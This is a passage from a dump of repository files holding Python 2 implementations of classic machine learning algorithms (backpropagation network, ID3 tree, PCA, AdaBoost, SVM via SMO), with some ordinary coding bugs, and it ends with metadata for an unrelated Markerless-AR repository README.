output_layer_bias)\n\n\t\tself.init_input_to_hidden_weight(hidden_layer_weights)\n\t\tself.init_hidden_to_output_weight(output_layer_weights)\n\n\n\tdef init_input_to_hidden_weight(self, hidden_layer_weights):\n\t\t# pdb.set_trace()\n\t\twix = 0\n\t\tfor i in range(len(self.hidden_layer.neurons)):\n\t\t\tfor j in range(self.num_inputs):\n\t\t\t\tif hidden_layer_weights:\n\t\t\t\t\tself.hidden_layer.neurons[i].weight.append(hidden_layer_weights[wix])\n\t\t\t\telse:\n\t\t\t\t\tself.hidden_layer.neurons[i].weight.append(random.random())\n\t\t\t\twix += 1\n\n\n\tdef init_hidden_to_output_weight(self, output_layer_weights):\n\t\twix = 0\n\t\tfor i in range(len(self.output_layer.neurons)):\n\t\t\tfor j in range(len(self.hidden_layer.neurons)):\n\t\t\t\tif output_layer_weights:\n\t\t\t\t\tself.output_layer.neurons[i].weight.append(output_layer_weights[wix])\n\t\t\t\telse:\n\t\t\t\t\tself.output_layer.neurons[i].weight.append(random.random())\n\t\t\t\twix += 1\n\n\n\tdef feed_forward(self, inputs):\n\t\thidden_layer_output = self.hidden_layer.feed_forward(inputs)\n\t\treturn self.output_layer.feed_forward(hidden_layer_output)\n\n\n\tdef train(self, training_inputs, training_outputs):\n\t\tself.feed_forward(training_inputs)\n\n\t\t# output delta\n\t\toutput_delta = [0] * len(self.output_layer.neurons)\n\t\tfor i in range(len(output_delta)):\n\t\t\toutput_delta[i] = self.output_layer.neurons[i].cal_delta(training_outputs[i])\n\n\t\t# hidden layer delta: w * delta * f'(z)\n\t\thidden_delta = [0] * len(self.hidden_layer.neurons)\n\t\tfor i in range(len(hidden_delta)):\n\t\t\tw_p_delta = 0\n\t\t\tfor j in range(len(self.output_layer.neurons)):\n\t\t\t\tw_p_delta += output_delta[j] * self.output_layer.neurons[j].weight[i]\n\t\t\thidden_delta[i] = w_p_delta * self.hidden_layer.neurons[i].cal_derivative()\n\n\t\t# update weight\n\t\t# update output layer weight\n\t\tfor i in range(len(self.output_layer.neurons)):\n\t\t\tfor j in range(len(self.output_layer.neurons[i].weight)):\n\t\t\t\tself.output_layer.neurons[i].weight[j] -= self.rate * output_delta[i] * self.output_layer.neurons[i].inputs[j]\n\n\t\t\t\t# update bias\n\t\t\t\tself.output_layer.neurons[i].bias -= self.rate * output_delta[i]\n\n\t\t# update hidden layer weight\n\t\tfor i in range(len(self.hidden_layer.neurons)):\n\t\t\tfor j in range(len(self.hidden_layer.neurons[i].weight)):\n\t\t\t\tself.hidden_layer.neurons[i].weight[j] -= self.rate * hidden_delta[i] * self.hidden_layer.neurons[i].inputs[j]\n\n\t\t\t\t# update bias\n\t\t\t\tself.hidden_layer.neurons[i].bias -= self.rate * hidden_delta[i]\n\n\n\tdef total_error(self, train):\n\t\terr = 0\n\t\tfor t in range(len(train)):\n\t\t\tinputs, outputs = train[t]\n\t\t\tself.feed_forward(inputs)\n\t\t\tfor i in range(len(outputs)):\n\t\t\t\terr += self.output_layer.neurons[i].cal_error(outputs[i])\n\t\treturn err\n\n\n# layer of neuron network\nclass NueronLayer:\n\tdef __init__(self, num_neurons, bias):\n\t\tself.bias = bias if bias else random.random()\n\t\tself.neurons = []\n\t\tfor i in range(num_neurons):\n\t\t\tself.neurons.append(Neuron(self.bias))\n\n\tdef feed_forward(self, x):\n\t\tself.outputs = []\n\t\tfor n in self.neurons:\n\t\t\tself.outputs.append(n.cal_output(x))\n\t\treturn self.outputs\n\n\nclass Neuron:\n\tdef __init__ (self, bias):\n\t\tself.bias = bias\n\t\tself.weight = []\n\n\tdef cal_input(self, x):\n\t\ty = 0\n\t\t# print len(x), len(self.weight)\n\t\tfor i in range(len(x)):\n\t\t\ty += self.weight[i] * x[i]\n\t\treturn y + self.bias\n\n\n\tdef cal_output(self, x):\n\t\tself.inputs = x\n\t\tself.output = self.squash(self.cal_input(x))\n\t\treturn self.output\n\t\n\tdef squash(self, total_input):\n\t\treturn 1 / (1 + math.exp(-total_input))\n\n\t# Mean Square Error\n\tdef cal_error(self, target):\n\t\treturn 0.5 * (self.output - target) ** 2\n\n\t# for Mean Square Error, the delta of output is E / z = (y - t)\n\tdef cal_delta(self, target):\n\t\treturn self.output - target\n\n\n\t# for sigmoid function, the derivative of it is f'(x) = f(x) * (1 - f(x))\n\tdef cal_derivative(self):\n\t\treturn self.output * (1 - self.output)\n\n\n\nif __name__ == '__main__':\n\tnn = NeuronNetwork(2,2,2,hidden_layer_weights=[0.15, 0.2, 0.25, 0.3], hidden_layer_bias=0.35, output_layer_weights=[0.4, 0.45, 0.5, 0.55], output_layer_bias=0.6)\n\tfor i in range(100):\n\t\tnn.train([0.05, 0.1], [0.01, 0.99])\n\t\tprint(i, round(nn.total_error([[[0.05, 0.1], [0.01, 0.99]]]), 9))" }, { "alpha_fraction": 0.6756656765937805, "alphanum_fraction": 0.6897189617156982, "avg_line_length": 23.151784896850586, "blob_id": "6bf286d6e9d4c5bd91d144b0d6ddb191ff5ff6e4", "content_id": "fa05f7a59d4c33bef60f12d1bd462784bd51971c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2704, "license_type": "no_license", "max_line_length": 70, "num_lines": 112, "path": "/id3/tree.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom math import log\nimport operator\nimport pdb\n\n\t\t\n\n# calculate the entropy\ndef calcShannonEnt(dataSet):\n\tnumEnt = len(dataSet)\n\tlabelCount = {}\n\tfor featvec in dataSet:\n\t\tlabel = featvec[-1]\n\t\tif label not in labelCount.keys():\n\t\t\tlabelCount[label] = 0\n\t\tlabelCount[label] += 1\n\tshannonEnt = 0.0\n\tfor key in labelCount:\n\t\tp = float(labelCount[key]) / numEnt\n\t\tshannonEnt = shannonEnt - p * log(p,2)\n\treturn shannonEnt\n\n\ndef splitDataSet(dataSet, axis, value):\n\tretDataSet=[]\n\tfor vec in dataSet:\n\t\tif vec[axis] == value:\n\t\t\treducedFeatVec = vec[:axis]\n\t\t\treducedFeatVec.extend(vec[axis+1:])\n\t\t\tretDataSet.append(reducedFeatVec)\n\treturn retDataSet\n\n#choose the best feature to split the dataset\ndef chooseBestFeature(dataSet):\n\tnumFeature = len(dataSet[0]) - 1\n\tbestFeature = -1\n\toriEnt = calcShannonEnt(dataSet)\n\tnumdat = len(dataSet)\n\tbestEnt = 0.0\n\tfor i in range(numFeature):\n\t\tallvalue = [vec[i] for vec in dataSet]\n\t\tuniqueVals = set(allvalue)\n\t\thGain = 0.0\n\t\tfor val in uniqueVals:\n\t\t\tsplitdat = splitDataSet(dataSet, i, val)\n\t\t\tent = calcShannonEnt(splitdat)\n\t\t\tprob = float(len(splitdat)) / numdat\n\t\t\thGain += prob * ent\n\t\tcurEntgain = oriEnt - hGain\n\t\tif curEntgain > bestEnt:\n\t\t\tbestEnt = curEntgain\n\t\t\tbestFeature = i\n\treturn bestFeature, bestEnt\n\n#get the class label that has the most entries\ndef majorityClass(classList):\n\tcls = {}\n\tfor c in classList:\n\t\tif c not in cls:\n\t\t\tcls[c] = 0\n\t\tcls[c] += 1\n\tsortedcls = sorted(cls, key = operator.itemgetter(1), reverse = True)\n\treturn sortedcls[0][0]\n\n#build tree by dataSet and attrs\ndef createTree(dataSet, attrs):\n\tlabels = [vec[-1] for vec in dataSet]\n\tif len(labels) == labels.count(labels[0]):\n\t\treturn labels[0]\n\tif len(dataSet[0]) == 1:\n\t\treturn majorityClass(labels)\n\tbestFeat,_ = chooseBestFeature(dataSet)\n\tvalues = [vec[bestFeat] for vec in dataSet]\n\tuniqueVals = set(values)\n\tbestFeatLabel = attrs[bestFeat]\n\ttree = {bestFeatLabel:{}}\n\tfor val in uniqueVals:\n\t\tsubattr = attrs[:bestFeat]\n\t\tsubattr.extend(attrs[bestFeat+1:])\n\t\tsubDat = splitDataSet(dataSet, bestFeat, val)\n\t\ttree[bestFeatLabel][val] = createTree(subDat, subattr)\n\treturn tree\n\ndef classify(tree, attrs, x):\n\tfirstStr = tree.keys()[0]\n\tdic = tree[firstStr]\n\tfeatIndex = attrs.index(firstStr)\n\tnext = dic[x[featIndex]]\n\tif type(next).__name__ == 'dict':\n\t\tclassLabel = classify(next, attrs, x)\n\telse:\n\t\tclassLabel = next\n\treturn classLabel\n\n\ndef createDataSet():\n\tdataSet = [\n\t[1,1,'yes'],\n\t[1,1,'yes'],\n\t[1,0,'no'],\n\t[0,1,'no'],\n\t[0,1,'no']\n\t]\n\tattrs = ['no surfacing', 'flippers']\n\treturn dataSet, attrs\n\nif __name__ == '__main__':\n\tdataSet, attrs = createDataSet()\n\ttree = createTree(dataSet, attrs)\n\tprint tree\n\tprint classify(tree, attrs, [1,0])" }, { "alpha_fraction": 0.7181274890899658, "alphanum_fraction": 0.730079710483551, "avg_line_length": 28.558822631835938, "blob_id": "d382bff2e6aea78819f553f6c5a6991bca283bea", "content_id": "c3ea1ea640c29ddd80931e883d4dca3c2c7f57e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "no_license", "max_line_length": 71, "num_lines": 34, "path": "/pca/pca.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "from numpy import *\n\n\"\"\"\nremove the mean\ncompute the covariance matrix\nfind the eigenvalues and eigenvectors of the covariance matrix\nsort the eigenvalues by desc\ntake top-N eigenvectors\ntransform the data into the new space created by the top-N eigenvectors\n\"\"\"\n\ndef loadDataSet(file, delim = '\\t'):\n\tfr = open(file)\n\tstringArr = [line.strip().split(delim) for line in fr.readlines()]\n\tdatArr = [map(float, line) for line in stringArr]\n\treturn datArr\n\ndef pca(dataMat, topNfeat = 9999999):\n\tmeanVals = mean(dataMat, axis = 0)\n\tmeanRemove = dataMat - meanVals\n\tcovMat = cov(meanRemove, rowvar = 0)\n\teigVals, eigVec = linalg.eig(mat(covMat))\n\teigValInd = argsort(eigVals)\n\teigValInd = eigValInd[:-(topNfeat+1):-1]\n\tredEigVec = eigVec[:, eigValInd]\n\tlowDDataMat = meanRemove * redEigVec\n\treconMat = lowDDataMat * redEigVec.T + meanVals\n\treturn lowDDataMat, reconMat\n\n\nif __name__ == \"__main__\":\n\tdatArr = loadDataSet(\"testSet.txt\", '\\t')\n\tlowDDataMat, reconMat = pca(datArr, 1)\n\tprint lowDDataMat, reconMat" }, { "alpha_fraction": 0.78125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "b0138169f58a25926db6b9fd64038ba539695a23", "content_id": "fd41c78dd1cd5e6fc15fb82a87fcd9d3991bf7c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 64, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/README.md", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "# Machine Learning Algorithms\ncompleted by python 2.7 and numpy\n" }, { "alpha_fraction": 0.6020539402961731, "alphanum_fraction": 0.6261874437332153, "avg_line_length": 25.6849308013916, "blob_id": "f3c55b98e58b6f541f282c0f5687881f895bd131", "content_id": "dcc72051f20ebb6cc1301afadc2add58d17e1f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "no_license", "max_line_length": 68, "num_lines": 146, "path": "/adaboost/adaboost.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom numpy import *\nimport pdb\nimport matplotlib.pyplot as plt\n\ndef loadData():\n\tx = matrix([[ 1. , 2.1],\n\t\t[ 2. , 1.1],\n\t\t[ 1.3, 1. ],\n\t\t[ 1. , 1. ],\n\t\t[ 2. , 1. ]])\n\ty = [1.0, 1.0, -1.0, -1.0, 1.0]\n\treturn x, y\n\ndef loadDataSet(file):\n\tfeaNum = len(open(file).readline().split('\\t'))\n\tdataMat = []\n\tlabel = []\n\tfr = open(file)\n\tfor line in fr.readlines():\n\t\tls = line.strip().split('\\t')\n\t\tlineArr = []\n\t\tfor i in range(feaNum-1):\n\t\t\tlineArr.append(float(ls[i]))\n\t\tdataMat.append(lineArr)\n\t\tlabel.append(float(ls[-1]))\n\treturn dataMat, label\n\n\n\n\ndef stumpClassify(dataMatrix,dimen,threshVal,threshIneq):\n\tret = ones((shape(dataMatrix)[0], 1))\n\tif threshIneq == \"lt\":\n\t\tret[dataMatrix[:,dimen] <= threshVal] = -1\n\telse:\n\t\tret[dataMatrix[:,dimen] > threshVal] = -1\n\treturn ret\n\n\ndef buildStump(dataArr, classLabels, D):\n\tx = mat(dataArr)\n\ty = mat(classLabels).T\n\tm,n = shape(x)\n\tnumStep = 10.0\n\tbestStump = {}\n\tminErr = inf\n\tbestClassEst = mat(zeros((m,1)))\n\tfor dimen in range(n): # for each dimension\n\t\trangeMin = x[:,dimen].min()\n\t\trangeMax = x[:,dimen].max()\n\t\tstepSize = (rangeMax - rangeMin) / numStep\n\t\tfor step in range(-1, int(numStep) + 1): # for each split step\n\t\t\tfor threshIneq in [\"lt\", \"gt\"]: # for each inequation\n\t\t\t\tthreshVal = rangeMin + float(step) * stepSize\n\t\t\t\terr = mat(ones((m,1)))\n\t\t\t\tpred = stumpClassify(x, dimen, threshVal, threshIneq)\n\t\t\t\t# pdb.set_trace()\n\t\t\t\terr[pred==y] = 0\n\t\t\t\tweightedErr = D.T * err\n\t\t\t\tif weightedErr < minErr:\n\t\t\t\t\tbestStump['dim'] = dimen\n\t\t\t\t\tbestStump['thresh'] = threshVal\n\t\t\t\t\tbestStump['ineq'] = threshIneq\n\t\t\t\t\tminErr = weightedErr\n\t\t\t\t\tbestClassEst = pred.copy()\n\treturn bestStump, bestClassEst, minErr\n\ndef adaBoostTrain(x, y, numIt=40):\n\tweakCls = []\n\tm, n = shape(x)\n\tD = mat(ones((m,1)) / m)\n\taggClassEst = mat(zeros((m,1)))\n\tfor i in range(numIt):\n\t\tbestStump, classEst, err = buildStump(x, y , D)\n\t\t# print \"D:\",D.T\n\t\talpha = float(0.5 * log((1-err) / max(err, 1e-16)))\n\t\tbestStump[\"alpha\"] = alpha\n\t\tweakCls.append(bestStump)\n\t\t# print \"classEst: \",classEst.T\n\t\t# pdb.set_trace()\n\t\texpon = multiply(-1 * alpha * mat(y).T, classEst)\n\t\tD = multiply(D, exp(expon))\n\t\tD = D / D.sum()\n\t\taggClassEst = aggClassEst + alpha * classEst\n\t\t# print \"aggClassEst: \",aggClassEst.T\n\t\tgx = sign(aggClassEst)\n\t\taggErr = multiply(gx != mat(y).T, ones((m,1)))\n\t\terrRate = aggErr.sum() / float(m)\n\t\t# print \"total error: \",errRate,\"\\n\"\n\t\tif errRate == 0.0: break\n\treturn weakCls, aggClassEst\n\n\ndef adaClassifier(x, clc):\n\tx = mat(x)\n\tm, n = shape(x)\n\taggClassEst = mat(zeros((m,1)))\n\tfor c in clc:\n\t\tclassEst = stumpClassify(x, c['dim'], c['thresh'], c['ineq'])\n\t\taggClassEst += c['alpha'] * classEst\n\t\tprint aggClassEst\n\treturn sign(aggClassEst)\n\n\ndef plotROC(predStrengths, classLabels):\n\tcur = (1.0, 1.0)\n\tySum = 0.0\n\tnumPos = sum(array(classLabels)==1.0)\n\tyStep = 1 / float(numPos)\n\txStep = 1 / float(len(classLabels) - numPos)\n\tsortedIndex = predStrengths.argsort()\n\tfig = plt.figure()\n\tfig.clf()\n\tax = plt.subplot(111)\n\tfor index in sortedIndex.tolist()[0]:\n\t\tif classLabels[index] == 1.0:\n\t\t\tdelX = 0\n\t\t\tdelY = yStep\n\t\telse:\n\t\t\tdelX = xStep\n\t\t\tdelY = 0\n\t\t\tySum += cur[1]\n\t\tax.plot([cur[0], cur[0]-delX], [cur[1], cur[1]-delY], c='b')\n\t\tcur = (cur[0]-delX, cur[1]-delY)\n\tax.plot([0,1], [0,1], 'b--')\n\tplt.xlabel('False Positive Rate'); plt.ylabel('True Positive Rate')\n\tplt.title('ROC curve for AdaBoost Horse Colic Detection System')\n\tax.axis([0,1,0,1])\n\tplt.show()\n\tprint \"the Area Under the Curve is: \",ySum*xStep\n\nif __name__ == \"__main__\":\n\t# x, y = loadData()\n\t# clc = adaBoostTrain(x, y, 9)\n\t# print adaClassifier([0,0], clc)\n\n\n\tx, y = loadDataSet('horseColicTraining2.txt')\n\tclc, aggClassEst = adaBoostTrain(x, y, 10)\n\tplotROC(aggClassEst.T, y)\n\t# xtest, ytest = loadDataSet('horseColicTest2.txt')\n\t# pred = adaClassifier(xtest, clc)\n\t# err = mat(ones((shape(pred)[0], 1)))\n\t# print err[pred != mat(ytest).T].sum()" }, { "alpha_fraction": 0.5364475250244141, "alphanum_fraction": 0.553211510181427, "avg_line_length": 24.165876388549805, "blob_id": "794570097c3d34bf731c8bba14c490a9a7cf0ee9", "content_id": "7bd74005731d10268303035392341e918417da4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5309, "license_type": "no_license", "max_line_length": 134, "num_lines": 211, "path": "/svm/svm.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! /bin/python\n\nfrom numpy import *\n\nclass optStruct(object):\n\t\"\"\"docstring for optStruct\"\"\"\n\tdef __init__(self, x, y, C, toler):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.C = C\n\t\tself.toler = toler\n\t\tself.m = shape(x)[0]\n\t\tself.alphas = mat(zeros((self.m, 1)))\n\t\tself.b = 0\n\t\tself.eCache = mat(zeros((self.m, 2)))\n\ndef calcEk(oS, k):\n\tf_xk = float(multiply(oS.alphas, oS.y).T * kernel(oS.x, oS.x[k,:])) + oS.b\n\tEk = f_xk - float(oS.y[k])\n\treturn Ek\n\ndef selectJ(i, Ei,oS):\n\tmaxDelta = 0\n\tmaxK = -1\n\tEj = 0\n\toS.eCache[i] = [1, Ei]\n\tvalidECacheList = nonzero(oS.eCache[:, 0].A)[0]\n\tif(len(validECacheList) > 1):\n\t\tfor k in validECacheList:\n\t\t\tif k == i:\n\t\t\t\tcontinue\n\t\t\tEk = calcEk(oS, k)\n\t\t\tdeltaE = abs(Ek - Ei)\n\t\t\tif deltaE > maxDelta:\n\t\t\t\tmaxDelta = deltaE\n\t\t\t\tmaxK = k\n\t\t\t\tEj = Ek\n\t\treturn maxK, Ej\n\telse:\n\t\tj = selectJrand(i, oS.m)\n\t\tEj = calcEk(oS, j)\n\treturn j, Ej\n\t\t\ndef updateEk(oS, k):\n\toS.eCache[k] = calcEk(oS, k)\n\n\ndef innerL(i, oS):\n\tEi = calcEk(oS, i)\n\tif (Ei * oS.y[i] < -oS.toler and oS.alphas[i] < oS.C) or (Ei * oS.y[i] > oS.toler and oS.alphas[i] > 0):\n\t\tj, Ej = selectJ(i, Ei, oS)\n\t\talpha_i_old = oS.alphas[i]\n\t\talpha_j_old = oS.alphas[j]\n\t\tif oS.y[i] == oS.y[j]:\n\t\t\tL = max(0, alpha_i_old + alpha_j_old - oS.C)\n\t\t\tH = min(oS.C, alpha_j_old + alpha_i_old)\n\t\telse:\n\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\tH = min(oS.C, oS.C+alpha_j_old - alpha_i_old)\n\t\tif L==H:\n\t\t\treturn 0\n\t\teta = kernel(oS.x[i], oS.x[i]) + kernel(oS.x[j], oS.x[j]) - 2 * kernel(oS.x[i], oS.x[j])\n\t\tif eta <= 0:\n\t\t\tprint \"eta <= 0\"\n\t\t\treturn 0\n\t\toS.alphas[j] = alpha_j_old + y[j] * (Ei - Ej) / eta\n\t\toS.alphas[j] = clipAlpha(oS.alphas[j], H, L)\n\t\tupdateEk(oS, j)\n\t\tif abs(oS.alphas[j] - alpha_j_old) < 0.00001:\n\t\t\tprint \"j not moving enough\"\n\t\t\treturn 0\n\t\toS.alphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old- oS.alphas[j])\n\t\tupdateEk(oS, i)\n\t\tb1 = oS.b - Ei - y[i] * kernel(x[i], x[i])*(oS.alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i]) * (oS.alphas[j] - alpha_j_old)\n\t\tb2 = oS.b - Ej - y[i] * kernel(x[i], x[j]) * (oS.alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j]) * (oS.alphas[j] - alpha_j_old)\n\n\t\tif 0 < oS.alphas[i] and oS.alphas[i] < oS.C:\n\t\t\toS.b = b1\n\t\telif 0 < oS.alphas[j] and oS.alphas[j] < oS.C:\n\t\t\toS.b = b2\n\t\telse:\n\t\t\toS.b = (b1+b2) / 2.0\n\t\treturn 1\n\telse:\n\t\treturn 0\n\ndef smoP(x, y, C, toler, maxIter, kTup=('lin', 0)):\n\toS = optStruct(mat(x), mat(y).transpose(), C, toler)\n\titer = 0\n\tentireSet = True; alphaPairsChanged = 0\n\twhile (iter < maxIter) and (alphaPairsChanged > 0) or entireSet:\n\t\talphaPairsChanged = 0\n\t\tif entireSet:\n\t\t\tfor i in range(oS.m):\n\t\t\t\talphaPairsChanged += innerL(i, oS)\n\t\t\titer += 1\n\t\telse:\n\t\t\tnonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]\n\t\t\tfor i in nonBoundIs:\n\t\t\t\talphaPairsChanged += innerL(i,oS)\n\t\t\titer += 1\n\t\tif entireSet: entireSet = False\n\t\telif (alphaPairsChanged == 0): entireSet = True\n\treturn oS.b,oS.alphas\n\n\n\n\"\"\"\nload dataSet\n\"\"\"\ndef loadDataSet():\n\tfr = open(\"testSet.txt\")\n\tx = []\n\ty = []\n\tfor line in fr.readlines():\n\t\tls = line.split(\"\\t\")\n\t\tx.append([float(ls[0]), float(ls[1])])\n\t\ty.append(float(ls[2]))\n\treturn x, y\n\n\ndef selectJrand(i, m):\n\tj = i\n\twhile j==i:\n\t\tj = random.uniform(0,m)\n\treturn j\n\n\"\"\"\nselect alpha between L and H\n\"\"\"\ndef clipAlpha(aj, H, L):\n\tif aj > H:\n\t\taj = H\n\tif aj < L:\n\t\taj = L\n\treturn aj\n\n\ndef kernel(x, xi):\n\treturn x * xi.T\n\n\ndef smoSimple(x, y, C, toler, maxIter):\n\tx = mat(x)\n\ty = mat(y)\n\tb = 0\n\tm,n = shape(x)\n\talphas = mat(zeros((m,1)))\n\titer = 0\n\twhile iter < maxIter:\n\t\talphaChange = 0\n\t\tfor i in range(m):\n\t\t\tf_xi = float(multiply(alphas, y).T * kernel(x, x[i,:])) + b\n\t\t\tEi = f_xi - float(y[i])\n\t\t\tif y[i] * f_xi < -toler and alphas[i] < C or\\\n\t\t\ty[i] * f_xi > toler and alphas[i] > 0:\n\t\t\t\tj = selectJrand(i, m)\n\t\t\t\tf_xj = float(multiply(alphas, y).T * kernel(x, x[j,:])) + b\n\t\t\t\tEj = f_xj - y[j]\n\t\t\t\talpha_i_old = alpha[i].copy()\n\t\t\t\talpha_j_old = alpha[j].copy()\n\t\t\t\tif y[i] == y[j]:\n\t\t\t\t\tL = max(0, alpha_i_old+ alpha_j_old - C)\n\t\t\t\t\tH = min(C, alpha_i_old + alpha_j_old)\n\t\t\t\telse:\n\t\t\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\t\t\tH = min(C + alpha_j_old - alpha_i_old)\n\t\t\t\tif L==H:\n\t\t\t\t\tprint \"L==H\"\n\t\t\t\t\tcontinue\n\t\t\t\teta = kernel(x[i], x[i]) + kernel(x[j], x[j]) - 2 * kernel(x[i], x[j])\n\t\t\t\talphas[j] += y[i] * (Ei - Ej)\n\t\t\t\talphas[j] = clipAlpha(alphas[j], H, L)\n\t\t\t\tif alphas[j] - alpha_j_old < 0.00001:\n\t\t\t\t\tprint \"j not moving enough\"\n\t\t\t\t\tcontinue\n\t\t\t\talphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old - alphas[j])\n\t\t\t\tb1 = b - Ei - y[i] * kernel(x[i], x[i]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i])*(alphas[j] - alpha_j_old)\n\t\t\t\tb2 = b - Ej - y[i] * kernel(x[i], x[j]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j])*(alphas[j] - alpha_j_old)\n\t\t\t\tif alphas[i] > 0 and alphas[i] < C:\n\t\t\t\t\tb = b1\n\t\t\t\telif alphas[j] > 0 and alphas[j] < C:\n\t\t\t\t\tb = b2\n\t\t\t\telse:\n\t\t\t\t\tb = (b1 + b2) / 2.0\n\t\t\t\talphaChange += 1\n\t\t\t\tprint \"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaChange)\n\t\tif alphaChange == 0:\n\t\t\titer += 1\n\t\telse:\n\t\t\titer = 0\n\t\tprint \"iteration number: %d\" % iter\n\treturn alphas, b\n\n\ndef calWc(alphas, x, y):\n\tx = mat(x)\n\ty = mat(y).transpose()\n\tm,n = shape(x)\n\tw = zeros((n,1))\n\tfor i in range(m):\n\t\tw += multiply(alphas[i] * y[i], x[i].T)\n\treturn w\n\n\n\nif __name__ == '__main__':\n\tx,y = loadDataSet()\n\talphas, b = smoP(x,y,0.6,0.001,40)\n\n\tprint alphas" } ]
10
1982026927/Markerless-AR
https://github.com/1982026927/Markerless-AR
ae035c184cdfed4bf03573ddca6d94fe9166b3a2
ba6cb272ae64ea225cc51a9775d9f8653f0a9995
10517511204cd8db098cac31b94dfede2a1dbae5
refs/heads/master
2023-06-03T20:37:08.869258
2018-07-21T03:30:09
2018-07-21T03:30:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7546276450157166, "alphanum_fraction": 0.7604390978813171, "avg_line_length": 70.47692108154297, "blob_id": "2920e014e55c4f57a4db8e6bf364446b00c6f015", "content_id": "8e4677754f9088cbb1c24d178451ba4775908822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4646, "license_type": "no_license", "max_line_length": 462, "num_lines": 65, "path": "/README.md", "repo_name": "1982026927/Markerless-AR", "src_encoding": "UTF-8", "text": "# Markerless-AR\nMarkerless AR is the process of rendering a 3d object into a real world environment without the need of a [marker](https://docs.opencv.org/3.1.0/d5/dae/tutorial_aruco_detection.html).\n\n# Dependencies:\n * OpenCV\n * Pygame\n * Numpy\n * Imutils\n * Scikit-image\n * Matplotlib\n * PyOpenGl\n * Pillow\n\n# Usage:\nAR Using an Image:\n```\npython arImage.py -s sceneImageName\n```\nAR Using Video:\n```\npython arImage.py -s sceneVideoName\n```\nNote: Make sure the image or video exists within the imgs folder.\n\n# How it Works:\nThere are a few things that need to be done in order to render 3d objects without a marker:\n * Find Planar Object\n * Feature Matching\n * Find Homography\n * Calculate Camera Intrinsic and Extrinsic Matrices\n * Tie it all together\n\n# 1. Find Planar Object:\n * Given a scene image (or frame if using a video), we must find a planar object (magazine, paper, book, etc.) that we will use to attach our 3d object to like we would with a marker. It seems just as restricting as having to rely on a marker but the main difference is that these planar objects exist naturally in the real world whereas markers do not.\n\n * Using Canny Edge Detector and then finding the contours, we can get the outline of our planar object which we can then crop out. We then apply a perspective transform in order to get a top-down view of our object in case it has some rotation or translation in the scene. The result of this process will be our query image (planar object), which we will use to perform the feature detection and matching.\n\n# 2. Feature Matching:\n * We want to be able to find and keep track of where our planar object is as we move around in the real world. Using feature matching can help solve this problem. By detecting keypoints in our query and scene image, we can be sure that we only look for parts of the images that contain a lot of information. The reason for this is that we only have to match on those keypoints as opposed to the entire image, which makes finding our planar object a lot easier.\n \n * There are a few different algorithms used for feature detecting such as ORB, SURF, SIFT. In this project we use ORB. Once the keypoints are found, we extract the descriptors. The descriptor is a vector that contains information about the feature point. \n \n * The matching of feature points is done using a knnMatch which does a search of the nearest neighbor from one set of descriptors to another set. Afterwards, a ratio test is applied to filter out outliers based on distance between the two matches being compared.\n \n# 3. Find Homography\n * With the above filtered set of matched feature points, we can now calculate the homography. A homography is a 3x3 transformation matrix that maps the points of one image to another if they are part of the same planar surface:\n \n * If we wanted to, we could refine the homography by applying a warping perspective on the scene using the homography and reapplying the feature matching and descriptor extraction. \n \n# 4. Calculate Camera Intrinsic and Extrinsic Matrices\n * The camera intrinsic matrix (referred to as K) is a 3x3 matrix used to transform 3d camera coordinates to 2d homogeneous image coordinates. \n ![Alt text](/imgs/readme_imgs/K_initial.jpg?raw=true \"Camera Intrinsics\") \n The matrix is made up of the focal length (fx and fy), the principal point offsets (cx and cy), and axis skew (s), which in most cases can be set to 0. This gives us: \n ![Alt text](/imgs/readme_imgs/K_final.jpg?raw=true \"Camera Intrinsics\") \n This matrix can be calculated based on some assumptions but the focal length must be found with a specific calibration method. You can also obtain the entire matrix by calibrating the camera with a chessboard, which OpenCV provides a built in function just for that.\n \n * The camera extrinsic matrix ([R|t]) is a 3x4 matrix which describes the camera's position in the real world and the direction it is pointing in. \n ![Alt text](/imgs/readme_imgs/Rt.jpg?raw=true \"Camera Intrinsics\") \n The matrix has two components: a 3x3 rotation matric (R) and a 3x1 translation matrix (t). This matrix can be extracted from the homography or using K and built in OpenCV functions.\n \n# Tie it all together:\n * Once we have all the components found above, we must format it so that OpenGL knows what to do with everything. This is done with the Python wrapper for OpenGL, PyOpenGL.\n ![Alt text](/imgs/readme_imgs/output_1.png?raw=true \"Script in Action\")\n ![Alt text](/imgs/readme_imgs/output_2.png?raw=true \"Script in Action\")\n ![Alt text](/imgs/readme_imgs/output_3.png?raw=true \"Script in Action\")\n" }, { "alpha_fraction": 0.5770667791366577, "alphanum_fraction": 0.6093165874481201, "avg_line_length": 28.64339828491211, "blob_id": "17ebf4791123a9cde246c02212c5b06c9295a66c", "content_id": "0ba8a74242dd5c3e249ec408ba17617954575e9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19535, "license_type": "no_license", "max_line_length": 105, "num_lines": 659, "path": "/arVideo.py", "repo_name": 